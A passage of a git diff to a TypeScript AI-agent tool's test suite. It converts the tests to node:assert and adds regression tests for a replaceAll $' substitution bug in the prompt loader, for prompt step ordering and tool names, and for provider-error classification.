   // Verify the expected wrapper format that inlineRequirementsFromDb would produce
   const wrapped = `### Requirements\nSource: \`.gsd/REQUIREMENTS.md\`\n\n${formatted}`;
-  assertMatch(wrapped, /^### Requirements/, 'wrapped requirements start with ### Requirements');
-  assertMatch(wrapped, /Source:.*REQUIREMENTS\.md/, 'wrapped requirements have source path');
+  assert.match(wrapped, /^### Requirements/, 'wrapped requirements start with ### Requirements');
+  assert.match(wrapped, /Source:.*REQUIREMENTS\.md/, 'wrapped requirements have source path');
 
   closeDatabase();
 }
@@ -142,13 +141,13 @@ console.log('\n=== prompt-db: project content from DB ===');
   });
 
   const content = queryProject();
-  assertEq(content, '# Test Project\n\nThis is the project description.', 'queryProject returns content');
+  assert.deepStrictEqual(content, '# Test Project\n\nThis is the project description.', 'queryProject returns content');
 
   // Verify the expected wrapper format that inlineProjectFromDb would produce
   const wrapped = `### Project\nSource: \`.gsd/PROJECT.md\`\n\n${content}`;
-  assertMatch(wrapped, /^### Project/, 'wrapped project starts with ### Project');
-  assertMatch(wrapped, /Source:.*PROJECT\.md/, 'wrapped project has source path');
-  assertMatch(wrapped, /# Test Project/, 'wrapped project includes content');
+  assert.match(wrapped, /^### Project/, 'wrapped project starts with ### Project');
+  assert.match(wrapped, /Source:.*PROJECT\.md/, 'wrapped project has source path');
+  assert.match(wrapped, /# Test Project/, 'wrapped project includes content');
 
   closeDatabase();
 }
@@ -160,27 +159,27 @@ console.log('\n=== prompt-db: project content from DB ===');
 console.log('\n=== prompt-db: fallback when DB unavailable ===');
 {
   closeDatabase();
-  assertTrue(!isDbAvailable(), 'DB should not be available');
+  assert.ok(!isDbAvailable(), 'DB should not be available');
 
   // queryDecisions returns [] when DB closed — helper would fall back
   const decisions = queryDecisions({ milestoneId: 'M001' });
-  assertEq(decisions, [], 'queryDecisions returns [] when DB closed');
+  assert.deepStrictEqual(decisions, [], 'queryDecisions returns [] when DB closed');
 
   // queryRequirements returns [] when DB closed — helper would fall back
   const requirements = queryRequirements({ sliceId: 'S01' });
-  assertEq(requirements, [], 'queryRequirements returns [] when DB closed');
+  assert.deepStrictEqual(requirements, [], 'queryRequirements returns [] when DB closed');
 
   // queryProject returns null when DB closed — helper would fall back
   const project = queryProject();
-  assertEq(project, null, 'queryProject returns null when DB closed');
+  assert.deepStrictEqual(project, null, 'queryProject returns null when DB closed');
 
   // formatDecisionsForPrompt returns '' for empty input
   const formatted = formatDecisionsForPrompt([]);
-  assertEq(formatted, '', 'formatDecisionsForPrompt returns empty for empty input');
+  assert.deepStrictEqual(formatted, '', 'formatDecisionsForPrompt returns empty for empty input');
 
   // formatRequirementsForPrompt returns '' for empty input
   const formattedReqs = formatRequirementsForPrompt([]);
-  assertEq(formattedReqs, '', 'formatRequirementsForPrompt returns empty for empty input');
+  assert.deepStrictEqual(formattedReqs, '', 'formatRequirementsForPrompt returns empty for empty input');
 }
 
 // ═══════════════════════════════════════════════════════════════════════════
@@ -210,15 +209,15 @@ console.log('\n=== prompt-db: scoped filtering reduces content ===');
   const allDecisions = queryDecisions();
   const m001Decisions = queryDecisions({ milestoneId: 'M001' });
 
-  assertEq(allDecisions.length, 10, 'unscoped returns all 10 decisions');
-  assertTrue(m001Decisions.length < 10, `M001-scoped returns fewer than 10 (got ${m001Decisions.length})`);
-  assertTrue(m001Decisions.length > 0, 'M001-scoped returns at least 1');
+  assert.deepStrictEqual(allDecisions.length, 10, 'unscoped returns all 10 decisions');
+  assert.ok(m001Decisions.length < 10, `M001-scoped returns fewer than 10 (got ${m001Decisions.length})`);
+  assert.ok(m001Decisions.length > 0, 'M001-scoped returns at least 1');
 
   // Format both and compare sizes — scoped should be shorter
   const allFormatted = formatDecisionsForPrompt(allDecisions);
   const scopedFormatted = formatDecisionsForPrompt(m001Decisions);
 
-  assertTrue(
+  assert.ok(
     scopedFormatted.length < allFormatted.length,
     `scoped content (${scopedFormatted.length} chars) should be shorter than unscoped (${allFormatted.length} chars)`,
   );
@@ -245,14 +244,14 @@ console.log('\n=== prompt-db: scoped filtering reduces content ===');
   const allReqs = queryRequirements();
   const s01Reqs = queryRequirements({ sliceId: 'S01' });
 
-  assertEq(allReqs.length, 8, 'unscoped returns all 8 requirements');
-  assertTrue(s01Reqs.length < 8, `S01-scoped returns fewer than 8 (got ${s01Reqs.length})`);
-  assertTrue(s01Reqs.length > 0, 'S01-scoped returns at least 1');
+  assert.deepStrictEqual(allReqs.length, 8, 'unscoped returns all 8 requirements');
+  assert.ok(s01Reqs.length < 8, `S01-scoped returns fewer than 8 (got ${s01Reqs.length})`);
+  assert.ok(s01Reqs.length > 0, 'S01-scoped returns at least 1');
 
   const allReqsFormatted = formatRequirementsForPrompt(allReqs);
   const scopedReqsFormatted = formatRequirementsForPrompt(s01Reqs);
 
-  assertTrue(
+  assert.ok(
     scopedReqsFormatted.length < allReqsFormatted.length,
     `scoped requirements (${scopedReqsFormatted.length} chars) should be shorter than unscoped (${allReqsFormatted.length} chars)`,
   );
@@ -292,23 +291,23 @@ console.log('\n=== prompt-db: DB helpers wrapper format matches expected pattern
 
   // Simulate what inlineDecisionsFromDb does
   const decisions = queryDecisions({ milestoneId: 'M001' });
-  assertTrue(decisions.length === 1, 'got 1 decision for M001');
+  assert.ok(decisions.length === 1, 'got 1 decision for M001');
   const dFormatted = formatDecisionsForPrompt(decisions);
   const dWrapped = `### Decisions\nSource: \`.gsd/DECISIONS.md\`\n\n${dFormatted}`;
-  assertMatch(dWrapped, /^### Decisions\nSource: `.gsd\/DECISIONS\.md`\n\n\| #/, 'decisions wrapper format correct');
+  assert.match(dWrapped, /^### Decisions\nSource: `.gsd\/DECISIONS\.md`\n\n\| #/, 'decisions wrapper format correct');
 
   // Simulate what inlineRequirementsFromDb does
   const reqs = queryRequirements({ sliceId: 'S01' });
-  assertTrue(reqs.length === 1, 'got 1 requirement for S01');
+  assert.ok(reqs.length === 1, 'got 1 requirement for S01');
   const rFormatted = formatRequirementsForPrompt(reqs);
   const rWrapped = `### Requirements\nSource: \`.gsd/REQUIREMENTS.md\`\n\n${rFormatted}`;
-  assertMatch(rWrapped, /^### Requirements\nSource: `.gsd\/REQUIREMENTS\.md`\n\n### R001/, 'requirements wrapper format correct');
+  assert.match(rWrapped, /^### Requirements\nSource: `.gsd\/REQUIREMENTS\.md`\n\n### R001/, 'requirements wrapper format correct');
 
   // Simulate what inlineProjectFromDb does
   const project = queryProject();
-  assertTrue(project !== null, 'project content exists');
+  assert.ok(project !== null, 'project content exists');
   const pWrapped = `### Project\nSource: \`.gsd/PROJECT.md\`\n\n${project}`;
-  assertMatch(pWrapped, /^### Project\nSource: `.gsd\/PROJECT\.md`\n\n# Project Name/, 'project wrapper format correct');
+  assert.match(pWrapped, /^### Project\nSource: `.gsd\/PROJECT\.md`\n\n# Project Name/, 'project wrapper format correct');
 
   closeDatabase();
 }
@@ -322,8 +321,9 @@ import { join } from 'node:path';
 import { tmpdir } from 'node:os';
 import { migrateFromMarkdown } from '../md-importer.ts';
 
-console.log('\n=== prompt-db: re-import updates DB when source markdown changes ===');
-{
+
+describe('prompt-db', () => {
+test('prompt-db: re-import updates DB when source markdown changes', () => {
   // Create a temp dir simulating a project with .gsd/DECISIONS.md
   const tmpDir = mkdtempSync(join(tmpdir(), 'prompt-db-reimport-'));
   const gsdDir = join(tmpDir, '.gsd');
@@ -345,9 +345,9 @@ console.log('\n=== prompt-db: re-import updates DB when source markdown changes
 
   // Verify initial state: 2 decisions
   const initial = queryDecisions();
-  assertEq(initial.length, 2, 're-import: initial import has 2 decisions');
+  assert.deepStrictEqual(initial.length, 2, 're-import: initial import has 2 decisions');
   const initialIds = initial.map(d => d.id).sort();
-  assertEq(initialIds, ['D001', 'D002'], 're-import: initial decisions are D001, D002');
+  assert.deepStrictEqual(initialIds, ['D001', 'D002'], 're-import: initial decisions are D001, D002');
 
   // Now "the LLM modifies DECISIONS.md" — add a third decision
   const updatedDecisions = `# Decisions Register
@@ -365,23 +365,23 @@ console.log('\n=== prompt-db: re-import updates DB when source markdown changes
 
   // Verify DB now has 3 decisions
   const afterReimport = queryDecisions();
-  assertEq(afterReimport.length, 3, 're-import: after re-import has 3 decisions');
+  assert.deepStrictEqual(afterReimport.length, 3, 're-import: after re-import has 3 decisions');
   const afterIds = afterReimport.map(d => d.id).sort();
-  assertEq(afterIds, ['D001', 'D002', 'D003'], 're-import: decisions are D001, D002, D003');
+  assert.deepStrictEqual(afterIds, ['D001', 'D002', 'D003'], 're-import: decisions are D001, D002, D003');
 
   // Verify the new decision has correct data
   const d003 = afterReimport.find(d => d.id === 'D003');
-  assertTrue(d003 !== undefined, 're-import: D003 exists');
-  assertEq(d003!.when_context, 'M001/S02', 're-import: D003 when_context is M001/S02');
-  assertEq(d003!.scope, 'runtime', 're-import: D003 scope is runtime');
-  assertEq(d003!.choice, 'D014 pattern', 're-import: D003 choice is D014 pattern');
+  assert.ok(d003 !== undefined, 're-import: D003 exists');
+  assert.deepStrictEqual(d003!.when_context, 'M001/S02', 're-import: D003 when_context is M001/S02');
+  assert.deepStrictEqual(d003!.scope, 'runtime', 're-import: D003 scope is runtime');
+  assert.deepStrictEqual(d003!.choice, 'D014 pattern', 're-import: D003 choice is D014 pattern');
 
   // Verify scoped query picks up the new decision
   const m001Scoped = queryDecisions({ milestoneId: 'M001' });
-  assertTrue(m001Scoped.length === 3, 're-import: all 3 decisions are for M001');
+  assert.ok(m001Scoped.length === 3, 're-import: all 3 decisions are for M001');
 
   closeDatabase();
-}
+});
 
 // ─── Final Report ──────────────────────────────────────────────────────────
-report();
+});
diff --git a/src/resources/extensions/gsd/tests/prompt-loader-replacement.test.ts b/src/resources/extensions/gsd/tests/prompt-loader-replacement.test.ts
new file mode 100644
index 000000000..fcfd923ea
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/prompt-loader-replacement.test.ts
@@ -0,0 +1,178 @@
+/**
+ * Regression test for #2968: loadPrompt replaceAll expands $' in replacement strings.
+ *
+ * JavaScript's String.replaceAll interprets special replacement patterns ($', $`, $&)
+ * in the replacement string. When a template variable value contains $' (common in
+ * bash commands like `grep -q '^0$'`), the replacement injects the entire remainder
+ * of the template, causing exponential prompt expansion.
+ *
+ * The fix: use split/join instead of replaceAll, which has no special pattern
+ * interpretation.
+ */
+import test from "node:test";
+import assert from "node:assert/strict";
+
+/**
+ * Replicate the OLD (buggy) substitution logic from prompt-loader.ts.
+ * Uses replaceAll which interprets $' $` $& in the replacement string.
+ */
+function substituteBuggy(template: string, vars: Record<string, string>): string {
+  let content = template;
+  for (const [key, value] of Object.entries(vars)) {
+    content = content.replaceAll(`{{${key}}}`, value);
+  }
+  return content.trim();
+}
+
+/**
+ * Replicate the FIXED substitution logic from prompt-loader.ts.
+ * Uses split/join which treats the replacement as a literal string.
+ */
+function substituteFixed(template: string, vars: Record<string, string>): string {
+  let content = template;
+  for (const [key, value] of Object.entries(vars)) {
+    content = content.split(`{{${key}}}`).join(value);
+  }
+  return content.trim();
+}
+
+test("replaceAll $' expansion bug — demonstrates the problem", () => {
+  // This test shows the bug: replaceAll interprets $' as "insert portion after match"
+  const template = "Hello {{name}}, welcome to {{place}}!";
+  const valueWithDollarQuote = "grep -q '^0$'";
+
+  // Using replaceAll (buggy approach)
+  const buggyResult = template.replaceAll("{{name}}", valueWithDollarQuote);
+
+  // $' in the replacement string causes replaceAll to append the text after the match
+  // So it should NOT equal the expected result
+  const expected = "Hello grep -q '^0$', welcome to {{place}}!";
+
+  // The buggy result will contain extra text injected by $' expansion
+  assert.notEqual(buggyResult, expected,
+    "replaceAll should have expanded $' — if this fails, the JS engine changed behavior");
+  assert.ok(buggyResult.length > expected.length,
+    `Buggy result should be longer due to $' expansion. Got length ${buggyResult.length} vs expected ${expected.length}`);
+});
+
+test("split/join replacement — safe from $' expansion", () => {
+  const template = "Hello {{name}}, welcome to {{place}}!";
+  const valueWithDollarQuote = "grep -q '^0$'";
+
+  // Using split/join (safe approach)
+  const safeResult = template.split("{{name}}").join(valueWithDollarQuote);
+  const expected = "Hello grep -q '^0$', welcome to {{place}}!";
+
+  assert.equal(safeResult, expected,
+    "split/join should preserve $' literally without expansion");
+});
+
+test("fixed substitution preserves $' literally in replacement values", () => {
+  const template =
+    "Task: {{taskDescription}}\n\nVerification:\n```bash\n{{verificationCommand}}\n```\n\nEnd of prompt.";
+
+  const vars: Record<string, string> = {
+    taskDescription: "Run tests",
+    verificationCommand: "grep -c 'foo' file.txt | grep -q '^0$' && echo 'PASS' || echo 'FAIL'",
+  };
+
+  const buggyResult = substituteBuggy(template, vars);
+  const fixedResult = substituteFixed(template, vars);
+
+  // The $' in the verification command value should appear literally in fixed result
+  const expectedSnippet = "grep -q '^0$'";
+  assert.ok(fixedResult.includes(expectedSnippet),
+    `Fixed result should contain the literal string: ${expectedSnippet}`);
+
+  // The fixed result should NOT have blown up in size
+  const maxReasonableLength = 300;
+  assert.ok(fixedResult.length < maxReasonableLength,
+    `Fixed result length ${fixedResult.length} exceeds reasonable maximum ${maxReasonableLength} — prompt explosion detected!`);
+
+  // The buggy result DOES blow up — it's larger than the fixed result
+  assert.ok(buggyResult.length > fixedResult.length,
+    `Buggy result (${buggyResult.length}) should be larger than fixed (${fixedResult.length}) due to $' expansion`);
+});
+
+test("multiple $-pattern values do not cause cascading expansion", () => {
+  const template = "A: {{a}}\nB: {{b}}\nC: {{c}}\nEnd.";
+  const vars: Record<string, string> = {
+    a: "value with $' single quote pattern",
+    b: "value with $` backtick pattern",
+    c: "value with $& ampersand pattern",
+  };
+
+  const buggyResult = substituteBuggy(template, vars);
+  const fixedResult = substituteFixed(template, vars);
+
+  // The fixed version should preserve all values literally
+  assert.ok(fixedResult.includes("$'"), "Fixed result should contain literal $'");
+  assert.ok(fixedResult.includes("$`"), "Fixed result should contain literal $`");
+  assert.ok(fixedResult.includes("$&"), "Fixed result should contain literal $&");
+
+  // The fixed version should be a reasonable size
+  assert.ok(fixedResult.length < 200,
+    `Fixed result length ${fixedResult.length} should be under 200`);
+
+  // The buggy version will be larger due to expansion
+  assert.ok(buggyResult.length > fixedResult.length,
+    `Buggy result (${buggyResult.length}) should be larger than fixed (${fixedResult.length}) due to $-pattern expansion`);
+});
+
+test("realistic execute-task prompt does not explode with $' in slice plan", () => {
+  // Simulate a realistic execute-task template with multiple variables
+  const template = [
+    "# Execute Task",
+    "",
+    "## Context",
+    "Working directory: {{workingDirectory}}",
+    "Milestone: {{milestoneId}}",
+    "Slice: {{sliceId}} — {{sliceTitle}}",
+    "",
+    "## Slice Plan Excerpt",
+    "{{slicePlanExcerpt}}",
+    "",
+    "## Instructions",
+    "Complete the task described above.",
+    "{{skillActivation}}",
+    "",
+    "## Verification",
+    "Run the verification commands to confirm success.",
+  ].join("\n");
+
+  const slicePlanWithDollarPatterns = [
+    "### Step 1: Validate output",
+    "```bash",
+    "grep -c 'error' output.log | grep -q '^0$' && echo 'PASS' || echo 'FAIL'",
+    "```",
+    "",
+    "### Step 2: Check format",
+    "```bash",
+    "diff <(cat expected.txt) <(cat actual.txt) | grep -q '^$' && echo 'MATCH'",
+    "```",
+  ].join("\n");
+
+  const vars: Record<string, string> = {
+    workingDirectory: "/home/user/project",
+    milestoneId: "M001",
+    sliceId: "S01",
+    sliceTitle: "Build pipeline",
+    slicePlanExcerpt: slicePlanWithDollarPatterns,
+    skillActivation: "Load relevant skills.",
+  };
+
+  const fixedResult = substituteFixed(template, vars);
+
+  // Should contain the literal $' patterns
+  assert.ok(fixedResult.includes("'^0$'"), "Should preserve '^0$' literally");
+  assert.ok(fixedResult.includes("'^$'"), "Should preserve '^$' literally");
+
+  // Result should be reasonable size (template ~300 chars + values ~400 chars)
+  assert.ok(fixedResult.length < 1000,
+    `Result length ${fixedResult.length} exceeds 1000 — prompt explosion detected!`);
+
+  // Compare with buggy version to confirm it WOULD have exploded
+  const buggyResult = substituteBuggy(template, vars);
+  assert.ok(buggyResult.length > fixedResult.length * 1.5,
+    `Buggy result (${buggyResult.length}) should be significantly larger than fixed (${fixedResult.length})`);
+});
diff --git a/src/resources/extensions/gsd/tests/prompt-step-ordering.test.ts b/src/resources/extensions/gsd/tests/prompt-step-ordering.test.ts
new file mode 100644
index 000000000..9be886664
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/prompt-step-ordering.test.ts
@@ -0,0 +1,85 @@
+/**
+ * Regression test for #3696 — prompt step ordering and runtime fixes
+ *
+ * 1. complete-milestone.md: gsd_requirement_update (step 9) before
+ *    gsd_complete_milestone (step 10)
+ * 2. complete-slice.md: uses gsd_requirement_update
+ * 3. register-extension.ts: _gsdEpipeGuard logs instead of re-throwing
+ * 4. register-hooks.ts: session_before_compact only checks isAutoActive
+ */
+
+import { describe, test } from 'node:test';
+import assert from 'node:assert/strict';
+import { readFileSync } from 'node:fs';
+import { fileURLToPath } from 'node:url';
+import { dirname, join } from 'node:path';
+
+const __filename = fileURLToPath(import.meta.url);
+const __dirname = dirname(__filename);
+
+const completeMilestoneMd = readFileSync(
+  join(__dirname, '..', 'prompts', 'complete-milestone.md'),
+  'utf-8',
+);
+const completeSliceMd = readFileSync(
+  join(__dirname, '..', 'prompts', 'complete-slice.md'),
+  'utf-8',
+);
+const registerExtSrc = readFileSync(
+  join(__dirname, '..', 'bootstrap', 'register-extension.ts'),
+  'utf-8',
+);
+const registerHooksSrc = readFileSync(
+  join(__dirname, '..', 'bootstrap', 'register-hooks.ts'),
+  'utf-8',
+);
+
+describe('prompt step ordering (#3696)', () => {
+  test('gsd_requirement_update step appears before gsd_complete_milestone step', () => {
+    // Search for the numbered step definitions, not early "Do NOT call" warnings
+    const reqUpdateMatch = completeMilestoneMd.match(/^\d+\.\s.*gsd_requirement_update/m);
+    const completeMilestoneMatch = completeMilestoneMd.match(/^\d+\.\s.*gsd_complete_milestone/m);
+    assert.ok(reqUpdateMatch, 'gsd_requirement_update should appear in a numbered step');
+    assert.ok(completeMilestoneMatch, 'gsd_complete_milestone should appear in a numbered step');
+    const reqUpdateIdx = completeMilestoneMd.indexOf(reqUpdateMatch![0]);
+    const completeMilestoneIdx = completeMilestoneMd.indexOf(completeMilestoneMatch![0]);
+    assert.ok(
+      reqUpdateIdx < completeMilestoneIdx,
+      'gsd_requirement_update step must come before gsd_complete_milestone step',
+    );
+  });
+
+  test('complete-slice.md uses gsd_requirement_update', () => {
+    assert.match(completeSliceMd, /gsd_requirement_update/,
+      'complete-slice.md should reference gsd_requirement_update');
+  });
+});
+
+describe('register-extension _gsdEpipeGuard (#3696)', () => {
+  test('_gsdEpipeGuard exists and does not re-throw', () => {
+    assert.match(registerExtSrc, /_gsdEpipeGuard/,
+      '_gsdEpipeGuard should be defined in register-extension.ts');
+    // After the fix, the handler logs instead of throwing
+    assert.ok(
+      !registerExtSrc.includes('throw err'),
+      '_gsdEpipeGuard should NOT contain "throw err"',
+    );
+  });
+});
+
+describe('register-hooks session_before_compact (#3696)', () => {
+  test('session_before_compact only checks isAutoActive', () => {
+    // Extract the session_before_compact handler
+    const compactIdx = registerHooksSrc.indexOf('session_before_compact');
+    assert.ok(compactIdx > -1, 'session_before_compact hook should exist');
+    // The first check in the handler should be isAutoActive(), not isAutoPaused()
+    const afterCompact = registerHooksSrc.slice(compactIdx, compactIdx + 300);
+    assert.match(afterCompact, /isAutoActive\(\)/,
+      'session_before_compact should check isAutoActive()');
+    // Should NOT block compaction when paused
+    assert.ok(
+      !afterCompact.includes('isAutoPaused()'),
+      'session_before_compact should not check isAutoPaused',
+    );
+  });
+});
diff --git a/src/resources/extensions/gsd/tests/prompt-tool-names.test.ts b/src/resources/extensions/gsd/tests/prompt-tool-names.test.ts
new file mode 100644
index 000000000..5636c9a82
--- /dev/null
+++ b/src/resources/extensions/gsd/tests/prompt-tool-names.test.ts
@@ -0,0 +1,69 @@
+// prompt-tool-names — Ensures prompt files reference correct tool names.
+//
+// The registered GSD tool is `search-the-web`, not `web_search`.
+// `web_search` is an Anthropic API implementation detail that should
+// never appear in GSD prompts or agent frontmatter.
+// See: https://github.com/gsd-build/gsd-2/issues/2920
+
+import test from "node:test";
+import assert from "node:assert/strict";
+import { readFileSync, readdirSync } from "node:fs";
+import { join, dirname } from "node:path";
+import { fileURLToPath } from "node:url";
+
+const __dirname = dirname(fileURLToPath(import.meta.url));
+const promptsDir = join(__dirname, "..", "prompts");
+const agentsDir = join(__dirname, "..", "..", "..", "agents");
+
+/** Collect all .md files in a directory (non-recursive). */
+function mdFiles(dir: string): string[] {
+  return readdirSync(dir)
+    .filter((f) => f.endsWith(".md"))
+    .map((f) => join(dir, f));
+}
+
+const WRONG_TOOL = "web_search";
+const CORRECT_TOOL = "search-the-web";
+
+test("prompt files must not reference `web_search` — use `search-the-web` instead", () => {
+  const files = mdFiles(promptsDir);
+  assert.ok(files.length > 0, "Expected at least one prompt file");
+
+  const violations: string[] = [];
+  for (const file of files) {
+    const content = readFileSync(file, "utf-8");
+    if (content.includes(WRONG_TOOL)) {
+      violations.push(file);
+    }
+  }
+
+  assert.deepStrictEqual(
+    violations,
+    [],
+    `These prompt files reference "${WRONG_TOOL}" instead of "${CORRECT_TOOL}":\n${violations.join("\n")}`,
+  );
+});
+
+test("agent frontmatter must not reference `web_search` — use `search-the-web` instead", () => {
+  const files = mdFiles(agentsDir);
+  assert.ok(files.length > 0, "Expected at least one agent file");
+
+  const violations: string[] = [];
+  for (const file of files) {
+    const content = readFileSync(file, "utf-8");
+    // Check frontmatter tools line specifically
+    const frontmatterMatch = content.match(/^---\n([\s\S]*?)\n---/);
+    if (frontmatterMatch) {
+      const frontmatter = frontmatterMatch[1];
+      if (frontmatter.includes(WRONG_TOOL)) {
+        violations.push(file);
+      }
+    }
+  }
+
+  assert.deepStrictEqual(
+    violations,
+    [],
+    `These agent files reference "${WRONG_TOOL}" in frontmatter instead of "${CORRECT_TOOL}":\n${violations.join("\n")}`,
+  );
+});
diff --git a/src/resources/extensions/gsd/tests/provider-errors.test.ts b/src/resources/extensions/gsd/tests/provider-errors.test.ts
index 0512b4d90..34c4ed824 100644
--- a/src/resources/extensions/gsd/tests/provider-errors.test.ts
+++ b/src/resources/extensions/gsd/tests/provider-errors.test.ts
@@ -1,6 +1,6 @@
 /**
  * Provider error handling tests — consolidated from:
- *   - provider-error-classify.test.ts (classifyProviderError)
+ *   - provider-error-classify.test.ts (classifyError)
  *   - network-error-fallback.test.ts (isTransientNetworkError, getNextFallbackModel)
  *   - agent-end-provider-error.test.ts (pauseAutoForProviderError)
  */
@@ -10,102 +10,150 @@ import assert from "node:assert/strict";
 import { readFileSync } from "node:fs";
 import { join, dirname } from "node:path";
 import { fileURLToPath } from "node:url";
-import { classifyProviderError, pauseAutoForProviderError } from "../provider-error-pause.ts";
-import { getNextFallbackModel, isTransientNetworkError } from "../preferences.ts";
+import { classifyError, isTransient, isTransientNetworkError } from "../error-classifier.ts";
+import { pauseAutoForProviderError } from "../provider-error-pause.ts";
+import { resumeAutoAfterProviderDelay } from "../bootstrap/provider-error-resume.ts";
+import { getNextFallbackModel } from "../preferences.ts";
 
 const __dirname = dirname(fileURLToPath(import.meta.url));
 
-// ── classifyProviderError ────────────────────────────────────────────────────
+// ── classifyError ────────────────────────────────────────────────────────────
 
-test("classifyProviderError detects rate limit from 429", () => {
-  const result = classifyProviderError("HTTP 429 Too Many Requests");
-  assert.ok(result.isTransient);
-  assert.ok(result.isRateLimit);
-  assert.ok(result.suggestedDelayMs > 0);
+test("classifyError detects rate limit from 429", () => {
+  const result = classifyError("HTTP 429 Too Many Requests");
+  assert.ok(isTransient(result));
+  assert.equal(result.kind, "rate-limit");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs > 0);
 });
 
-test("classifyProviderError detects rate limit from message", () => {
-  const result = classifyProviderError("rate limit exceeded");
-  assert.ok(result.isTransient);
-  assert.ok(result.isRateLimit);
+test("classifyError detects rate limit from message", () => {
+  const result = classifyError("rate limit exceeded");
+  assert.ok(isTransient(result));
+  assert.equal(result.kind, "rate-limit");
 });
 
-test("classifyProviderError extracts reset delay from message", () => {
-  const result = classifyProviderError("rate limit exceeded, reset in 45s");
-  assert.ok(result.isRateLimit);
-  assert.equal(result.suggestedDelayMs, 45000);
+test("classifyError extracts reset delay from message", () => {
+  const result = classifyError("rate limit exceeded, reset in 45s");
+  assert.equal(result.kind, "rate-limit");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 45000);
 });
 
-test("classifyProviderError defaults to 60s for rate limit without reset", () => {
-  const result = classifyProviderError("429 too many requests");
-  assert.ok(result.isRateLimit);
-  assert.equal(result.suggestedDelayMs, 60_000);
+test("classifyError defaults to 60s for rate limit without reset", () => {
+  const result = classifyError("429 too many requests");
+  assert.equal(result.kind, "rate-limit");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 60_000);
 });
 
-test("classifyProviderError detects Anthropic internal server error", () => {
+test("classifyError treats stream_exhausted_without_result as transient connection failure", () => {
+  const result = classifyError("stream_exhausted_without_result");
+  assert.ok(isTransient(result));
+  assert.equal(result.kind, "connection");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 15_000);
+});
+
+test("classifyError detects Anthropic internal server error", () => {
   const msg = '{"type":"error","error":{"details":null,"type":"api_error","message":"Internal server error"}}';
-  const result = classifyProviderError(msg);
-  assert.ok(result.isTransient);
-  assert.ok(!result.isRateLimit);
-  assert.equal(result.suggestedDelayMs, 30_000);
+  const result = classifyError(msg);
+  assert.ok(isTransient(result));
+  assert.equal(result.kind, "server");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 30_000);
 });
 
-test("classifyProviderError detects Codex server_error from extracted message", () => {
+test("classifyError detects Codex server_error from extracted message", () => {
   // After fix, mapCodexEvents extracts the nested error type and produces
   // "Codex server_error: <message>" instead of raw JSON.
   const msg = "Codex server_error: An error occurred while processing your request.";
-  const result = classifyProviderError(msg);
-  assert.ok(result.isTransient);
-  assert.ok(!result.isRateLimit);
-  assert.equal(result.suggestedDelayMs, 30_000);
+  const result = classifyError(msg);
+  assert.ok(isTransient(result));
+  assert.equal(result.kind, "server");
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 30_000);
 });
 
-test("classifyProviderError detects overloaded error", () => {
-  const result = classifyProviderError("overloaded_error: Overloaded");
-  assert.ok(result.isTransient);
-  assert.equal(result.suggestedDelayMs, 30_000);
+test("classifyError detects overloaded error", () => {
+  const result = classifyError("overloaded_error: Overloaded");
+  assert.ok(isTransient(result));
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 30_000);
 });
 
-test("classifyProviderError detects 503 service unavailable", () => {
-  const result = classifyProviderError("HTTP 503 Service Unavailable");
-  assert.ok(result.isTransient);
+test("classifyError detects 503 service unavailable", () => {
+  const result = classifyError("HTTP 503 Service Unavailable");
+  assert.ok(isTransient(result));
 });
 
-test("classifyProviderError detects 502 bad gateway", () => {
-  const result = classifyProviderError("HTTP 502 Bad Gateway");
-  assert.ok(result.isTransient);
+test("classifyError detects 502 bad gateway", () => {
+  const result = classifyError("HTTP 502 Bad Gateway");
+  assert.ok(isTransient(result));
 });
 
-test("classifyProviderError detects auth error as permanent", () => {
-  const result = classifyProviderError("unauthorized: invalid API key");
-  assert.ok(!result.isTransient);
-  assert.ok(!result.isRateLimit);
+test("classifyError detects auth error as permanent", () => {
+  const result = classifyError("unauthorized: invalid API key");
+  assert.ok(!isTransient(result));
+  assert.equal(result.kind, "permanent");
 });
 
-test("classifyProviderError detects billing error as permanent", () => {
-  const result = classifyProviderError("billing issue: payment required");
-  assert.ok(!result.isTransient);
+test("classifyError detects billing error as permanent", () => {
+  const result = classifyError("billing issue: payment required");
+  assert.ok(!isTransient(result));
 });
 
-test("classifyProviderError detects quota exceeded as permanent", () => {
-  const result = classifyProviderError("quota exceeded for this month");
-  assert.ok(!result.isTransient);
+test("classifyError detects quota exceeded as permanent", () => {
+  const result = classifyError("quota exceeded for this month");
+  assert.ok(!isTransient(result));
 });
 
-test("classifyProviderError treats unknown error as permanent", () => {
-  const result = classifyProviderError("something went wrong");
-  assert.ok(!result.isTransient);
+test("classifyError treats unknown error as not transient", () => {
+  const result = classifyError("something went wrong");
+  assert.ok(!isTransient(result));
+  assert.equal(result.kind, "unknown");
 });
 
-test("classifyProviderError treats empty string as permanent", () => {
-  const result = classifyProviderError("");
-  assert.ok(!result.isTransient);
+test("classifyError treats empty string as not transient", () => {
+  const result = classifyError("");
+  assert.ok(!isTransient(result));
 });
 
-test("classifyProviderError: rate limit takes precedence over auth keywords", () => {
-  const result = classifyProviderError("429 unauthorized rate limit");
-  assert.ok(result.isRateLimit);
-  assert.ok(result.isTransient);
+test("classifyError: rate limit takes precedence over auth keywords", () => {
+  const result = classifyError("429 unauthorized rate limit");
+  assert.equal(result.kind, "rate-limit");
+  assert.ok(isTransient(result));
+});
+
+// ── STREAM_RE: V8 JSON parse error variants (#2916) ────────────────────────
+
+test("classifyError: 'Expected comma/brace after property value in JSON' is transient stream", () => {
+  const result = classifyError(
+    "Expected ',' or '}' after property value in JSON at position 2056 (line 1 column 2057)"
+  );
+  assert.equal(result.kind, "stream");
+  assert.ok(isTransient(result));
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 15_000);
+});
+
+test("classifyError: 'Expected colon after property name in JSON' is transient stream", () => {
+  const result = classifyError(
+    "Expected ':' after property name in JSON at position 500 (line 1 column 501)"
+  );
+  assert.equal(result.kind, "stream");
+  assert.ok(isTransient(result));
+  assert.ok("retryAfterMs" in result && result.retryAfterMs === 15_000);
+});
+
+test("classifyError: 'Expected property name or brace in JSON' is transient stream", () => {
+  const result = classifyError(
+    "Expected property name or '}' in JSON at position 42 (line 1 column 43)"
+  );
+  assert.equal(result.kind, "stream");
+  assert.ok(isTransient(result));
